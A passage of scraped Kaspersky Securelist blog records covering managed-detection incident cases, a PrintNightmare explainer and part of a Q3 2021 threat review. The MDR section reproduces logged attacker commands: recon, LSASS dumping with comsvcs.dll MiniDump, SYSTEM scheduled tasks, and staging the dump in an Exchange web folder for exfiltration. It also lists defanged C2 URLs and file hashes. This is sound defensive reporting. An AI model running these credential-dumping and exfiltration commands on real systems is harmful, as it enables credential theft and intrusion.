Kaspersky's report on this group's activity is available [here](<https://securelist.com/muddywaters-arsenal/90659/>).\n\nAmong other methods, the group uses VBS implants in phishing emails as an initial attack vector. During execution, the implant accesses URLs with a common structure to connect to the C2 server. The typical structure of the URL is provided below.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151840/MDR_interesting_cases_05-1024x283.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151840/MDR_interesting_cases_05.png>)\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094246/MDR-cases-05.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14152658/MDR_interesting_cases_06.png>) | First of all, MDR analysts found a VBS implant from startup, presumably related to the MuddyWater group, to be running on the monitored host. | \\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KLWB6.vbs \n---|---|--- \n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094253/MDR-cases-02.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | After script execution, some malicious resources were accessed. The structure of these URLs follows the common structure used by the MuddyWater group. In addition, the accessed IP address was observed in other attacks of this group. | hxxp://185[.]117[.]73[.]52:443/getTarget \nInfo?guid=xxx-yyy-zzz&status=1 \nhxxp://185[.]117[.]73[.]52:443/getComman \nd?guid=xxx-yyy-zzz* \n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094244/MDR-cases-06.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14153224/MDR_interesting_cases_07.png>) | Next, execution of commands to collect information from the compromised host was observed. | "C:\\Windows\\System32\\cmd.exe" /c \nexplorer.exe >> \nc:\\ProgramData\\app_setting_readme.txt "C:\\Windows\\System32\\cmd.exe" /c whoami >> c:\\ProgramData\\app_setting_readme.txt \n \n**_* xxx is company short name (identifier), yyy is the victim hostname and zzz is username_**\n\nTable below contains signs of suspicious activity that were the starting point for investigation.\n\n**MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** \n---|---|---|--- \n**T1071: \n**Application Layer Protocol | Access to malicious hosts from nonbrowsers | Target URL: \nhxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid \n=xxx-yyy-zzz&status=1 \nCMD line: \n"C:\\Windows\\System32\\WScript.exe" C:\\Users\\USERNAME\\AppData\\Roaming\\Microsoft\\Windo \nws\\Start Menu\\Programs\\Startup\\KLWB6.vbs \nProcess: \nC:\\Windows\\system32\\wscript.exe | VBS script accessed malicious URL during execution \n**T1071:** \nApplication Layer Protocol | URL exact detect | Malicious URL: \nhxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid \n=xxx-yyy-zzz&status=1 \nAV verdict: \nMalware | Malicious URL was successfully detected by AV \n \n## Credential Dumping from LSASS Memory\n\nIn the last case, we'd like to talk about an attack related to collecting credentials from the LSASS process memory dump (T1003.001 MITRE technique). Local Security Authority Subsystem Service (LSASS) stores a variety of credentials in process memory. These credentials can be harvested by System or administrative user and then used for attack development or lateral movement.\n\nMDR analysts detected an attempt to dump the LSASS process memory on the monitored host, despite the fact that most of the attacker's actions did not differ from the usual actions of the administrator. The attackers used two public tools (the first one was detected and blocked by an AV solution) to dump the LSASS process memory and export the obtained dump via Exchange server. In particular, the MDR team observed the download and execution of a suspicious DLL file (categorized as SSP) by LSASS.exe.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094248/MDR-cases-04.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151347/MDR_interesting_cases_04.png>) | The attacker executed several recon commands to get more information about the host, and then ran commands to get the LSASS process ID. | C:\\Windows\\System32\\tasklist.exe \nC:\\Windows\\System32\\findstr.exe /i sass \n---|---|--- \n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094253/MDR-cases-02.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | After that, the attacker tried to run a malicious tool to dump the process memory, but it was blocked by an endpoint protection solution. | "C:\\Windows\\System32\\rundll32.exe" \nC:\\Windows\\System32\\comsvcs.dll MiniDump 616 \nc:\\programdata\\cdera.bin full\n\n_## 616 is LSASS process id_ \n \n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094242/MDR-cases-07.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14154017/MDR_interesting_cases_08.png>) | Then the attacker tried to dump the LSASS process memory using another tool. They unzipped an archive containing the _resource.exe_ and _twindump.dll_ files. | C:\\Windows\\System32\\cmd.exe /C c:\\"program files"\\7- \nzip\\7z.exe x -pKJERKL6j4dk&@1 c:\\programdata\\m.zip -o \nc:\\windows\\cluster\n\n## _resource.exe_ and _twindump.dll_ files were created \n \n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094251/MDR-cases-03.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151142/MDR_interesting_cases_03.png>) | Subsequently, the file _resource.exe_ was added to the planned tasks and executed. However, the attempt to obtain an LSASS dump was unsuccessful. | C:\\Windows\\System32\\cmd.exe /C \nC:\\Windows\\System32\\staskes.exe /create /tn Ecoh /tr \n"cmd /c C:\\Windows\\cluster\\resource.exe \nase2af6das3fzc2 agasg2aa23gfdgd" /sc onstart /ru \nsystem /F\n\n## staskes.exe is a renamed schtasks.exe file \n \n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094241/MDR-cases-08.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14154042/MDR_interesting_cases_09.png>) | Later, one more attempt to perform this technique was made. The attacker unpacked an archive containing another malicious utility, and ran it the same way as previously. The created files are presumably related to the [MirrorDump](<https://github.com/CCob/MirrorDump>) tool. As a result, the attacker successfully obtained an LSASS dump. | C:\\Windows\\System32\\cmd.exe /C c:\\"program files"\\7- \nzip\\7z.exe x -p"KJERfK#L6j4dk321\u2033 \nc:\\programdata\\E.zip -o c:\\programdata\\ \nC:\\Windows\\System32\\cmd.exe \n/C c:\\windows\\system32\\staskes.exe /create /tn Ecoh /tr \n"c:\\programdata\\InEnglish.exe g2@j5js1 0sdfs,48 \nC:\\programdata\\EnglishEDouble \nC:\\programdata\\EnglishDDouble \nC:\\programdata\\English1.dll \nC:\\programdata\\English.dmp" /sc onstart /ru system /F C:\\Windows\\System32\\cmd.exe /C c:\\windows\\system32\\staskes.exe /run /tn Ecoh \n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/15094239/MDR-cases-09.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14154059/MDR_interesting_cases_10.png>) | Then the obtained dump was exported to Exchange server. Afterwards, the attacker deleted all the created files. | C:\\Windows\\System32\\cmd.exe /C copy \nc:\\programdata\\Es.zip \nc:\\Program Files\\Microsoft\\Exchange Server\\V14\\ClientAccess\\owa\\auth\\Es.png \n \nTable below contains signs of suspicious activity that were the starting point for investigation.\n\n**MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** \n---|---|---|--- \n**T1003.001:** \nOS Credential Dumping: LSASS Memory | AV exact detect | AV verdict: \nPDM:Exploit.Win32.GenericProcess command line: \n"C:\\Windows\\System32\\rundll32.exe" \nC:\\Windows\\System32\\comsvcs.dll MiniDump \n**616** C:\\programdata\\cdera.bin full \nParent process command line: \nC:\\Windows\\System32\\wsmprovhost.exe - \nEmbedding \nGrandparent process command line:: \nC:\\Windows\\System32\\svchost.exe -k \nDcomLaunchProcess logon type: 3 (Network logon) | Remotely executed \nprocess memory dump \nwas detected by AM \nengine \n**616** is LSASS process \nPID \n**T1003.001:** \nOS Credential Dumping: LSASS Memory | Create section (load DLL) \nExecute section (run DLL) | DLL name: C:\\programdata\\english1.dll \nProcess: C:\\Windows\\System32\\lsass.exe \nProcess PID: **616** \nParent process: command line: C:\\Windows\\System32\\wininit.exe \nProcess integrity level: System | Unknown DLL was loaded and executed within lsass.exe \n**T1003.001:** \nOS Credential Dumping: LSASS Memory | Inexact AV detect | Internal AV verdict: The file is Security Support \nProvider (SSP) \nFile path: C:\\programdata\\english1.dll \nProcess: C:\\Windows\\System32\\lsass.exe | Unknown DLL loaded to lsass is SSP \n**T1053.005:** \nScheduled Task/Job: Scheduled Task | Create process | Process command line: \nC:\\programdata\\InEnglish.exe g2@j5js1 \n0sdfs,48 C:\\programdata\\EnglishEDouble C:\\programdata\\EnglishDDouble \n**C:\\programdata**\\English1.dll \nC:\\programdata\\English.dmp \nParent process command line: \ntaskeng.exe {7725474B-D9EA-473D-B10D- \nAC0572A0AA70} S-1-5-18:NT \nAUTHORITY\\System:Service: \nGrandparent process command line: \nC:\\Windows\\System32\\svchost.exe -k netsvcs \nProcess integrity level: System \nProcess user SID: S-1-5-18 | Suspicious executable from C:\\programdata run as scheduled task under _System_ privileges \n \nObserved malicious files:\n\nc:\\programdata\\e.zip | 0x37630451944A1DD027F5A9B643790B10 \n---|--- \nc:\\programdata\\es.zip | 0x3319BD8B628F8051506EE8FD4999C4C3 \nc:\\programdata\\m.zip | 0xC15D90F8374393DA2533BAF7359E31F9 \nc:\\programdata\\inenglish.exe | 0xCB15B1F707315FB61E667E0218F7784D \nc:\\programdata\\english1.dll | 0x358C5061B8DF0E0699E936A0F48EAFE1 \nc:\\windows\\cluster\\resource.exe | 0x872A776C523FC33888C410081A650070 \nc:\\windows\\cluster\\twindump.dll | 0xF980FD026610E4D0B31BAA5902785EDE \n \n## Conclusion\n\nAttackers follow trends. They use any loophole to break into your corporate network. Sometimes they learn about new vulnerabilities in products earlier than security researchers do. Sometimes they hide so skillfully that their actions are indistinguishable from those of your employees or administrators.\n\nCountering targeted attacks requires extensive experience as well as constant learning. Kaspersky Managed Detection and Response delivers fully managed, individually tailored ongoing detection, prioritization, investigation, and response. As a result, it provides all the major benefits from having your own security operations center without having to actually set one up.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-15T10:00:42", "type": "securelist", "title": "Kaspersky Managed Detection and Response: interesting cases", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-12-15T10:00:42", "id": "SECURELIST:830DE5B1B5EBB6AEE4B12EF66AD749F9", "href": "https://securelist.com/kaspersky-managed-detection-and-response-interesting-cases/105214/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:23", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/12/05134321/abstract-malware-990x400.jpg)\n\n## Summary\n\nLast week Microsoft warned Windows users about vulnerabilities in the Windows Print Spooler service \u2013 CVE-2021-1675 and CVE-2021-34527 (also known as PrintNightmare). Both vulnerabilities can be used by an attacker with a regular user account to take control of a vulnerable server or client machine that runs the Windows Print Spooler service. This service is enabled by default on all Windows clients and servers, including domain controllers.\n\nKaspersky products protect against attacks leveraging these vulnerabilities. The following detection names are used:\n\n * HEUR:Exploit.Win32.CVE-2021-1675.*\n * HEUR:Exploit.Win32.CVE-2021-34527.*\n * HEUR:Exploit.MSIL.CVE-2021-34527.*\n * HEUR:Exploit.Script.CVE-2021-34527.*\n * HEUR:Trojan-Dropper.Win32.Pegazus.gen\n * PDM:Exploit.Win32.Generic\n * PDM:Trojan.Win32.Generic\n * Exploit.Win32.CVE-2021-1675.*\n * Exploit.Win64.CVE-2021-1675.*\n\nOur detection logic is also successfully blocks attack technique from the latest Mimikatz framework v. 2.2.0-20210707.\n\nWe are closely monitoring the situation and improving generic detection of these vulnerabilities using our [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and Exploit Prevention components. As part of our [Managed Detection and Response service](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) Kaspersky SOC experts are able to detect exploitation of these vulnerabilities, investigate such attacks and report to customers.\n\n## Technical details\n\n### CVE-2021-34527\n\nWhen using RPC protocols to add a new printer (_RpcAsyncAddPrinterDriver [MS-PAR] or RpcAddPrinterDriverEx [MS-RPRN]_) a client has to provide multiple parameters to the Print Spooler service:\n\n * _pDataFile_ - a path to a data file for this printer;\n * _pConfigFile_ - a path to a configuration file for this printer;\n * _pDriverPath_ - a path to a driver file that's used by this printer while it's working.\n\nThe service makes several checks to ensure _pDataFile_ and _pDriverPath_ are not UNC paths, but there is no corresponding check for pConfigFile, meaning the service will copy the configuration DLL to the folder _%SYSTEMROOT%\\system32\\spool\\drivers\\x64\\3\\_ (on x64 versions of the OS).\n\nNow, if the Windows Print Spooler service tries to add a printer again, but this time sets pDataFile to the copied DLL path (from the previous step), the print service will load this DLL because its path is not a UNC path, and the check will be successfully passed. These methods can be used by a low-privileged account, and the DLL is loaded by the _NT AUTHORITY\\SYSTEM group_ process.\n\n### CVE-2021-1675\n\nThe local version of PrintNightmare uses the same method for exploitation as CVE-2021-34527, but there's a difference in the entrypoint function (_AddPrinterDriverEx_). This means an attacker can place a malicious DLL in any locally accessible directory to run the exploit.\n\n## Mitigations\n\nKaspersky experts anticipate a growing number of exploitation attempts to gain access to resources inside corporate perimeters accompanied by a high risk of ransomware infection and data theft.\n\nTherefore, it is strongly recommended to follow Microsoft [guidelines](<https://docs.microsoft.com/en-us/defender-for-identity/cas-isp-print-spooler>) and apply the latest security updates for Windows.\n\nQuoting Microsoft (as of July 7th, 2021): \n_"Due to the possibility for exposure, domain controllers and Active Directory admin systems need to have the Print spooler service disabled. The recommended way to do this is using a Group Policy Object (GPO). \nWhile this security assessment focuses on domain controllers, any server is potentially at risk to this type of attack."_", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T05:00:06", "type": "securelist", "title": "Quick look at CVE-2021-1675 & CVE-2021-34527 (aka PrintNightmare)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-08T05:00:06", "id": "SECURELIST:0C07A61E6D92865F5B58728A60866991", "href": "https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T14:36:44", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/26093821/abstract_digits_cell-990x400.jpg)\n\n * **IT threat evolution Q3 2021**\n * [IT threat evolution in Q3 2021. PC statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-pc-statistics/104982/>)\n * [IT threat evolution in Q3 2021. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-mobile-statistics/105020/>)\n\n## Targeted attacks\n\n### WildPressure targets macOS\n\nLast March, we reported a [WildPressure campaign targeting industrial-related entities in the Middle East](<https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/>). While tracking this threat actor in spring 2021, we discovered a newer version. It contains the C++ Milum Trojan, a corresponding VBScript variant and a set of modules that include an orchestrator and three plugins. This confirms our previous assumption that there were more last-stagers besides the C++ ones.\n\nAnother language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Interestingly, this malware was developed for both Windows and macOS operating systems. The coding style, overall design and C2 communication protocol is quite recognizable across all three programming languages used by the authors.\n\nWildPressure used both virtual private servers (VPS) and compromised servers in its infrastructure, most of which were WordPress websites.\n\nWe have very limited visibility for the samples described in our report, but our telemetry suggests that the targets in this campaign were also from the oil and gas industry.\n\nYou can view our report on the new version [here](<https://securelist.com/wildpressure-targets-macos/103072/>), together with a video presentation of our findings.\n\n### LuminousMoth: sweeping attacks for the chosen few\n\nWe recently uncovered a large-scale and highly active attack against targets in Southeast Asia by a threat actor that we call [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). The campaign dates back to October last year and was still ongoing at the time we published our public report in July. Most of the early sightings were in Myanmar, but it seems the threat actor is now much more active in the Philippines. Targets include high-profile organizations: namely, government entities located both within those countries and abroad.\n\nMost APT threats carefully select their targets and tailor the infection vectors, implants and payloads to the victims' identities or environment. It's not often we observe a large-scale attack by APT threat actors \u2013 they usually avoid such attacks because they are too 'noisy' and risk drawing attention to the campaign. LuminousMoth is an exception. We observed a high number of infections; although we think the campaign was aimed at a few targets of interest.\n\nThe attackers obtain initial access to a system by sending a spear-phishing email to the victim containing a Dropbox download link. The link leads to a RAR archive that masquerades as a Word document. The archive contains two malicious DLL libraries as well as two legitimate executables that side-load the DLL files. We found multiple archives like this with file names of government entities linked to Myanmar.\n\nWe also observed a second infection vector that comes into play after the first one has successfully finished. The malware tries to spread to other hosts on the network by infecting USB drives.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12153755/LuminousMoth_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12153755/LuminousMoth_01.png>)\n\nIn addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate data.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12154002/LuminousMoth_05.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12154002/LuminousMoth_05.png>)\n\nThe threat actor also deploys an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser.\n\nInfrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which has been seen targeting the same region using similar tools in the past.\n\n### Targeted attacks exploiting CVE-2021-40444\n\nOn September 7, [Microsoft reported a zero-day vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) (CVE-2021-40444) that could allow an attacker to execute code remotely on vulnerable computers. The vulnerability is in MSHTML, the Internet Explorer engine. Even though few people use IE nowadays, some programs use its engine to handle web content \u2013 in particular, Microsoft Office applications.\n\nWe [have seen targeted attacks](<https://securelist.com/exploitation-of-the-cve-2021-40444-vulnerability-in-mshtml/104218/>) exploiting the vulnerability to target companies in research and development, the energy sector and other major industries, banking, the medical technology sector, as well as telecoms and IT.\n\nTo exploit the vulnerability, attackers embed a special object in a Microsoft Office document containing a URL for a malicious script. If the victim opens the document, Microsoft Office downloads the script and runs it using the MSHTML engine. Then the script can use ActiveX controls to perform malicious actions on the victim's computer.\n\n### Tomiris backdoor linked to SolarWinds attack\n\nThe SolarWinds incident last December stood out because of the extreme carefulness of the attackers and the high-profile nature of their victims. The evidence suggests that the threat actor behind the attack, DarkHalo (aka Nobelium), had spent six months inside OrionIT's networks to perfect their attack. The following timeline sums up the different steps of the campaign.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145035/SAS_story_Tomiris_connection_01-1024x576.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145035/SAS_story_Tomiris_connection_01.png>)\n\nIn June, more than six months after DarkHalo had gone dark, we observed the DNS hijacking of multiple government zones of a CIS member state that allowed the attacker to redirect traffic from government mail servers to computers under their control \u2013 probably achieved by obtaining credentials to the control panel of the victims' registrar. When victims tried to access their corporate mail, they were redirected to a fake copy of the web interface.\n\n[![Malicious webmail login page set up by the attackers](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145115/SAS_story_Tomiris_connection_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145115/SAS_story_Tomiris_connection_02.png>)\n\nAfter this, they were tricked into downloading previously unknown malware. The backdoor, dubbed Tomiris, bears a number of similarities to the second-stage malware, Sunshuttle (aka GoldMax), used by DarkHalo last year. However, there are also a number of overlaps between Tomiris and Kazuar, a backdoor that has been linked to the Turla APT threat actor. None of the similarities is enough to link Tomiris and Sunshuttle with sufficient confidence. However, taken together they suggest the possibility of common authorship or shared development practices.\n\nYou can read our analysis [here](<https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/>).\n\n### GhostEmperor\n\nEarlier this year, while investigating the rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. We attribute the activity to a previously unknown threat actor that we have called [GhostEmperor](<https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/>). This cluster stood out because it used a formerly unknown Windows kernel mode rootkit that we dubbed Demodex; and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers.\n\nThe rootkit is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver Signature Enforcement mechanism.\n\n[![An outline of the rootkit's loading phases](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150203/Ghost_Emperor_06.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150203/Ghost_Emperor_06.png>)\n\nWe identified multiple attack vectors that triggered an infection chain leading to the execution of the malware in memory. The majority of GhostEmperor infections were deployed on public-facing servers, as many of the malicious artefacts were installed by the httpd.exe Apache server process, the w3wp.exe IIS Windows server process, or the oc4j.jar Oracle server process. This means that the attackers probably abused vulnerabilities in the web applications running on those systems, allowing them to drop and execute their files.\n\n[![Overview of the GhostEmperor infection chain](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150042/Ghost_Emperor_04-1024x555.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150042/Ghost_Emperor_04.png>)\n\nAlthough infections often start with a BAT file, in some cases the known infection chain was preceded by an earlier stage: a malicious DLL that was side-loaded by wdichost.exe, a legitimate Microsoft command line utility (originally called MpCmdRun.exe). The side-loaded DLL then proceeds to decode and load an additional executable called license.rtf. Unfortunately, we did not manage to retrieve this executable, but we saw that the consecutive actions of loading it included the creation and execution of GhostEmperor scripts by wdichost.exe.\n\nThis toolset was in use from as early as July 2020, mainly targeting Southeast Asian entities, including government agencies and telecoms companies.\n\n### FinSpy: analysis of current capabilities\n\nAt the end of September, at the Kaspersky [Security Analyst Summit](<https://thesascon.com/>), our researchers provided an [overview of FinSpy](<https://securelist.com/finspy-unseen-findings/104322/>), an infamous surveillance toolset that several NGOs have repeatedly reported being used against journalists, political dissidents and human rights activists. Our analysis included not only the Windows version of FinSpy, but also Linux and macOS versions, which share the same internal structure and features.\n\nAfter 2018, we observed falling detection rates for FinSpy for Windows. However, it never actually went away \u2013 it was simply using various first-stage implants to hide its activities. We started detecting some suspicious backdoored installer packages (including TeamViewer, VLC Media Player and WinRAR); then in the middle of 2019 we found a host that served these installers along with FinSpy Mobile implants for Android.\n\nThe authors have gone to great lengths to make FinSpy inaccessible to security researchers \u2013 it seems they have put as much work into anti-analysis and obfuscation as they have into the Trojan itself. First, the samples are protected with multiple layers of evasion tactics.\n\n[![Overview of the user mode infection](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/26133002/SAS_story_FinFisher_02-641x1024-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/24151828/SAS_story_FinFisher_02.png>)\n\nMoreover, once the Trojan has been installed, it is heavily camouflaged using four complex, custom-made obfuscators.\n\nApart from Trojanized installers, we also observed infections involving use of a UEFI (Unified Extensible Firmware Interface) and MBR (Master Boot Record) bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our private report on FinSpy.\n\nThe user of a smartphone or tablet can be infected through a link in a text message. In some cases (for example, if the victim's iPhone has not been not [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)), the attacker may need physical access to the device.\n\n## Other malware\n\n### REvil attack on MSPs and their customers worldwide\n\nAn attack perpetrated by the REvil Ransomware-as-a-Service gang (aka Sodinokibi) targeting Managed Service Providers (MSPs) and their clients was discovered on July 2.\n\nThe attackers [identified and exploited](<https://threatpost.com/kaseya-patches-zero-day-exploits/167548/>) a zero-day vulnerability in the Kaseya Virtual System/Server Administrator (VSA) platform. The VSA software, used by Kaseya customers to remotely monitor and manage software and network infrastructure, is supplied either as a cloud service or via on-premises VSA servers.\n\nThe exploit involved deploying a malicious dropper via a PowerShell script. The script disabled Microsoft Defender features and then used the certutil.exe utility to decode a malicious executable (agent.exe) that dropped an older version of Microsoft Defender, along with the REvil ransomware packed into a malicious library. That library was then loaded by the legitimate MsMpEng.exe by utilizing the DLL side-loading technique.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/05113533/02-revil-attacks-msp-1024x516.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/05113533/02-revil-attacks-msp.png>)\n\nThe attack is estimated to have resulted in the encryption of files belonging to around 60 Kaseya customers using the on-premises version of the platform. Many of them were MSPs who use VSA to manage the networks of other businesses. This MSP connection gave REvil access to those businesses, and Kaseya estimated that [around 1,500 downstream businesses were affected](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>).\n\nUsing our Threat Intelligence service, we observed more than 5,000 attack attempts in 22 countries by the time [our analysis of the attack](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) was published.\n\n### What a [Print]Nightmare\n\nEarly in July, Microsoft published an alert about vulnerabilities in the Windows Print Spooler service. The vulnerabilities, [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>) and [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>) (aka PrintNightmare), can be used by an attacker with a regular user account to take control of a vulnerable server or client machine that runs the Windows Print Spooler service. This service is enabled by default on all Windows clients and servers, including domain controllers, making both vulnerabilities potentially very dangerous.\n\nMoreover, owing to a misunderstanding between teams of researchers, a [proof-of-concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (PoC) exploit for PrintNightmare was [published](<https://therecord.media/poc-released-for-dangerous-windows-printnightmare-bug/>) online. The researchers involved believed that Microsoft's Patch Tuesday release in June had already solved the problem, so they shared their work with the expert community. However, while Microsoft had published a patch for CVE-2021-1675, the PrintNightmare vulnerability remained unpatched until July. The PoC was quickly removed, but not before it had been copied multiple times.\n\nCVE-2021-1675 is a [privilege elevation](<https://encyclopedia.kaspersky.com/glossary/privilege-escalation/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) vulnerability, allowing an attacker with low access privileges to craft and use a malicious DLL file to run an exploit and gain higher privileges. However, that is only possible if the attacker already has direct access to the vulnerable computer in question.\n\nCVE-2021-34527 is significantly more dangerous because it is a [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RCE) vulnerability, which means it allows remote injection of DLLs.\n\nYou can find a more detailed technical description of both vulnerabilities [here](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>).\n\n### Grandoreiro and Melcoz arrests\n\nIn July, the Spanish Ministry of the Interior [announced](<http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853>) the arrest of 16 people connected to the [Grandoreiro and Melcoz (aka Mekotio) cybercrime groups](<https://securelist.com/arrests-of-members-of-tetrade-seed-groups-grandoreiro-and-melcoz/103366/>). Both groups are originally from Brazil and form part of the [Tetrade umbrella](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), operating for a few years now in Latin America and Western Europe.\n\nThe Grandoreiro banking Trojan malware family initially started its operations in Brazil and then expanded its operations to other Latin American countries and then to Western Europe. The group has regularly improved its techniques; and, based on our analysis of the group's campaigns, it operates as a [malware-as-a-service 